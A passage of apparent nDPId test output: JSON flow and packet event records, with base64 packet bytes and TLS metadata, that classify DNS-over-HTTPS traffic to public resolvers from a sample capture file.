beLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbw
HD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKm
oMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YE
VOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJ
T7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} 
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4
f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCV
wHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
